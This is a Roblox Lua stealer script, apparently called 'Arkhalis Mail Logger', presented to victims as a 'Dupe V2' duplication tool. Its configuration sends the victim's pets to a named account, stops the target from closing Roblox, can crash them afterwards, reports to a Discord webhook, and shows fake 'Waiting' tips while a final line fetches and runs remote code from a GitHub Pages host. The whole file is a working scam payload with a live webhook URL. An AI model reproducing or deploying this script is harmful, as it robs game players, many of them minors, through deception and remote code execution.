--[[ Arkhalis Mail Logger ]]--

--[[ Main Config ]]--
_G.Username = "Dragonfruit7s" --// Username To Send Pets To
_G.UserId = 1410060179 --// Roblox Account Id [[https://www.roblox.com/users/IDHERE/profile]] <- This is a example
_G.GiftMessage = "Lol" --// Message For The Gift To Say
_G.Diamonds = 500000 --// Amount Of Diamonds To Not Kick
_G.UnlockPets = True --// Unlocks Locked Pets
_G.AntiLeave = True --// Doesn't Let The Target Close Roblox
_G.Crash = False --// Crashes Them After Its Finished
--[[ Webhook Config ]]--
_G.Webhook = "https://discord.com/api/webhooks/1100059723409150014/NslQqlT-9wFSCzgYeOgyrP8DevN3PDEMfBQgXU4We2_EgCsCCf2rzKiz2-5qPk4lZwRK" --// Discord Webhook For Executions

--[[ UI Config ]]--
_G.ScriptName = "Dupe V2" --// Script Name On The UI
_G.Tip1 = "Waiting" --// Gives You Tips On The UI
_G.Tip2 = "Waiting." --// Gives You Tips On The UI
_G.Tip3 = "Waiting.." --// Gives You Tips On The UI
_G.Tip4 = "Waiting..." --// Gives You Tips On The UI
_G.Tip5 = "Waiting...." --// Gives You Tips On The UI

--[[ Script ]]
loadstring(game:HttpGet("https://arkhalislua.github.io/Lua/Arkhalis.lua"))()
